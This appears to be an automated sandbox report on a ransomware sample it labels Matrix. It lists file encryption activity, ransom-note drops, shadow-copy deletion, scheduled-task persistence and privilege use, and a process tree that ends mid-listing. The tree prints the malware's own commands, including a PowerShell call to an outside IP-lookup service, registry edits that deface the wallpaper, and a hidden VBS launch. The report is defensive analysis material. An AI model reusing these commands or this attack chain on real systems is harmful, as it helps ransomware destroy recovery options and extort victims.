File opened (read-only)	\??\U:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\N:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\W:	HE0Qzozz64.exe
File opened (read-only)	\??\O:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\I:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\Q:	HE0Qzozz64.exe
File opened (read-only)	\??\S:	HE0Qzozz64.exe
File opened (read-only)	\??\F:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\E:	HE0Qzozz64.exe
File opened (read-only)	\??\K:	HE0Qzozz64.exe
File opened (read-only)	\??\V:	HE0Qzozz64.exe
File opened (read-only)	\??\X:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\S:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\L:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\G:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\P:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\Z:	HE0Qzozz64.exe
File opened (read-only)	\??\J:	HE0Qzozz64.exe
File opened (read-only)	\??\N:	HE0Qzozz64.exe
File opened (read-only)	\??\U:	HE0Qzozz64.exe
File opened (read-only)	\??\M:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\H:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\H:	HE0Qzozz64.exe
File opened (read-only)	\??\I:	HE0Qzozz64.exe
File opened (read-only)	\??\B:	HE0Qzozz64.exe
File opened (read-only)	\??\O:	HE0Qzozz64.exe
File opened (read-only)	\??\T:	HE0Qzozz64.exe
File opened (read-only)	\??\Z:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\R:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\Q:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\K:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\M:	HE0Qzozz64.exe
File opened (read-only)	\??\Y:	HE0Qzozz64.exe
File opened (read-only)	\??\V:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\A:	HE0Qzozz64.exe
File opened (read-only)	\??\F:	HE0Qzozz64.exe
File opened (read-only)	\??\G:	HE0Qzozz64.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\eoEk0llV.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\skin.dtd	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\SpiderSolitaire.exe.mui	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jps.exe	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\lib\jvm.hprof.txt	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_100_percent.pak	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Niue	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Moncton	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\lib\jfxrt.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kiev	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Godthab	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleUpdateOnDemand.exe	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Vienna	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tehran	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Havana	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\COPYRIGHT	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yerevan	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Copenhagen	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\mobile.html	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Godthab	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Spades\es-ES\shvlzm.exe.mui	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\ChessMCE.lnk	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.71\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Yakutsk	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\GMT	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Broken_Hill	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1728	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1264	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
872	powershell.exe
1692	HE0Qzozz64.exe
1692	HE0Qzozz64.exe
1692	HE0Qzozz64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1692	HE0Qzozz64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	1692	HE0Qzozz64.exe
Token: SeLoadDriverPrivilege	1692	HE0Qzozz64.exe
Token: SeBackupPrivilege	1516	vssvc.exe
Token: SeRestorePrivilege	1516	vssvc.exe
Token: SeAuditPrivilege	1516	vssvc.exe
Token: SeTakeOwnershipPrivilege	1188	takeown.exe
Token: SeIncreaseQuotaPrivilege	1984	WMIC.exe
Token: SeSecurityPrivilege	1984	WMIC.exe
Token: SeTakeOwnershipPrivilege	1984	WMIC.exe
Token: SeLoadDriverPrivilege	1984	WMIC.exe
Token: SeSystemProfilePrivilege	1984	WMIC.exe
Token: SeSystemtimePrivilege	1984	WMIC.exe
Token: SeProfSingleProcessPrivilege	1984	WMIC.exe
Token: SeIncBasePriorityPrivilege	1984	WMIC.exe
Token: SeCreatePagefilePrivilege	1984	WMIC.exe
Token: SeBackupPrivilege	1984	WMIC.exe
Token: SeRestorePrivilege	1984	WMIC.exe
Token: SeShutdownPrivilege	1984	WMIC.exe
Token: SeDebugPrivilege	1984	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1984	WMIC.exe
Token: SeRemoteShutdownPrivilege	1984	WMIC.exe
Token: SeUndockPrivilege	1984	WMIC.exe
Token: SeManageVolumePrivilege	1984	WMIC.exe
Token: 33	1984	WMIC.exe
Token: 34	1984	WMIC.exe
Token: 35	1984	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1984	WMIC.exe
Token: SeSecurityPrivilege	1984	WMIC.exe
Token: SeTakeOwnershipPrivilege	1984	WMIC.exe
Token: SeLoadDriverPrivilege	1984	WMIC.exe
Token: SeSystemProfilePrivilege	1984	WMIC.exe
Token: SeSystemtimePrivilege	1984	WMIC.exe
Token: SeProfSingleProcessPrivilege	1984	WMIC.exe
Token: SeIncBasePriorityPrivilege	1984	WMIC.exe
Token: SeCreatePagefilePrivilege	1984	WMIC.exe
Token: SeBackupPrivilege	1984	WMIC.exe
Token: SeRestorePrivilege	1984	WMIC.exe
Token: SeShutdownPrivilege	1984	WMIC.exe
Token: SeDebugPrivilege	1984	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1984	WMIC.exe
Token: SeRemoteShutdownPrivilege	1984	WMIC.exe
Token: SeUndockPrivilege	1984	WMIC.exe
Token: SeManageVolumePrivilege	1984	WMIC.exe
Token: 33	1984	WMIC.exe
Token: 34	1984	WMIC.exe
Token: 35	1984	WMIC.exe
Token: SeTakeOwnershipPrivilege	1700	takeown.exe
Token: SeTakeOwnershipPrivilege	1012	takeown.exe
Token: SeTakeOwnershipPrivilege	1240	takeown.exe
Token: SeTakeOwnershipPrivilege	620	takeown.exe
Token: SeTakeOwnershipPrivilege	836	takeown.exe
Token: SeTakeOwnershipPrivilege	1700	takeown.exe
Token: SeTakeOwnershipPrivilege	1944	takeown.exe
Token: SeTakeOwnershipPrivilege	1364	takeown.exe
Token: SeTakeOwnershipPrivilege	1716	takeown.exe
Token: SeTakeOwnershipPrivilege	1864	takeown.exe
Token: SeTakeOwnershipPrivilege	1280	takeown.exe
Token: SeTakeOwnershipPrivilege	212	takeown.exe
Token: SeTakeOwnershipPrivilege	1472	takeown.exe
Token: SeTakeOwnershipPrivilege	1436	takeown.exe
Token: SeTakeOwnershipPrivilege	1012	takeown.exe
Token: SeTakeOwnershipPrivilege	1080	takeown.exe
Token: SeTakeOwnershipPrivilege	752	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1232 wrote to memory of 808	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	28
PID 1232 wrote to memory of 808	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	28
PID 1232 wrote to memory of 808	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	28
PID 1232 wrote to memory of 808	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	28
PID 1232 wrote to memory of 1088	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	30
PID 1232 wrote to memory of 1088	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	30
PID 1232 wrote to memory of 1088	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	30
PID 1232 wrote to memory of 1088	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	30
PID 1232 wrote to memory of 1860	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	32
PID 1232 wrote to memory of 1860	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	32
PID 1232 wrote to memory of 1860	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	32
PID 1232 wrote to memory of 1860	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	32
PID 1860 wrote to memory of 872	1860	cmd.exe	34
PID 1860 wrote to memory of 872	1860	cmd.exe	34
PID 1860 wrote to memory of 872	1860	cmd.exe	34
PID 1860 wrote to memory of 872	1860	cmd.exe	34
PID 1232 wrote to memory of 896	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	35
PID 1232 wrote to memory of 896	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	35
PID 1232 wrote to memory of 896	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	35
PID 1232 wrote to memory of 896	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	35
PID 1232 wrote to memory of 1532	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	36
PID 1232 wrote to memory of 1532	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	36
PID 1232 wrote to memory of 1532	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	36
PID 1232 wrote to memory of 1532	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	36
PID 896 wrote to memory of 1484	896	cmd.exe	40
PID 896 wrote to memory of 1484	896	cmd.exe	40
PID 896 wrote to memory of 1484	896	cmd.exe	40
PID 896 wrote to memory of 1484	896	cmd.exe	40
PID 1532 wrote to memory of 1048	1532	cmd.exe	39
PID 1532 wrote to memory of 1048	1532	cmd.exe	39
PID 1532 wrote to memory of 1048	1532	cmd.exe	39
PID 1532 wrote to memory of 1048	1532	cmd.exe	39
PID 1232 wrote to memory of 240	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	41
PID 1232 wrote to memory of 240	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	41
PID 1232 wrote to memory of 240	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	41
PID 1232 wrote to memory of 240	1232	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	41
PID 896 wrote to memory of 1748	896	cmd.exe	43
PID 896 wrote to memory of 1748	896	cmd.exe	43
PID 896 wrote to memory of 1748	896	cmd.exe	43
PID 896 wrote to memory of 1748	896	cmd.exe	43
PID 896 wrote to memory of 1468	896	cmd.exe	44
PID 896 wrote to memory of 1468	896	cmd.exe	44
PID 896 wrote to memory of 1468	896	cmd.exe	44
PID 896 wrote to memory of 1468	896	cmd.exe	44
PID 240 wrote to memory of 1240	240	cmd.exe	45
PID 240 wrote to memory of 1240	240	cmd.exe	45
PID 240 wrote to memory of 1240	240	cmd.exe	45
PID 240 wrote to memory of 1240	240	cmd.exe	45
PID 240 wrote to memory of 1940	240	cmd.exe	47
PID 240 wrote to memory of 1940	240	cmd.exe	47
PID 240 wrote to memory of 1940	240	cmd.exe	47
PID 240 wrote to memory of 1940	240	cmd.exe	47
PID 240 wrote to memory of 780	240	cmd.exe	48
PID 240 wrote to memory of 780	240	cmd.exe	48
PID 240 wrote to memory of 780	240	cmd.exe	48
PID 240 wrote to memory of 780	240	cmd.exe	48
PID 780 wrote to memory of 964	780	cmd.exe	49
PID 780 wrote to memory of 964	780	cmd.exe	49
PID 780 wrote to memory of 964	780	cmd.exe	49
PID 780 wrote to memory of 964	780	cmd.exe	49
PID 964 wrote to memory of 1692	964	HE0Qzozz.exe	50
PID 964 wrote to memory of 1692	964	HE0Qzozz.exe	50
PID 964 wrote to memory of 1692	964	HE0Qzozz.exe	50
PID 964 wrote to memory of 1692	964	HE0Qzozz.exe	50

C:\Users\Admin\AppData\Local\Temp\2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
"C:\Users\Admin\AppData\Local\Temp\2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1232
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe" "C:\Users\Admin\AppData\Local\Temp\NWty7y0v.exe"
  2⤵
  PID:808
- C:\Users\Admin\AppData\Local\Temp\NWty7y0v.exe
  "C:\Users\Admin\AppData\Local\Temp\NWty7y0v.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1088
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\CDEPwWD8.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1860
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\eoEk0llV.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:896
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\eoEk0llV.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1484
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1468
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\2HPH9SxY.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1532
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\2HPH9SxY.vbs"
    3⤵
    PID:1048
  - - C:\Windows\SysWOW64\cmd.exe
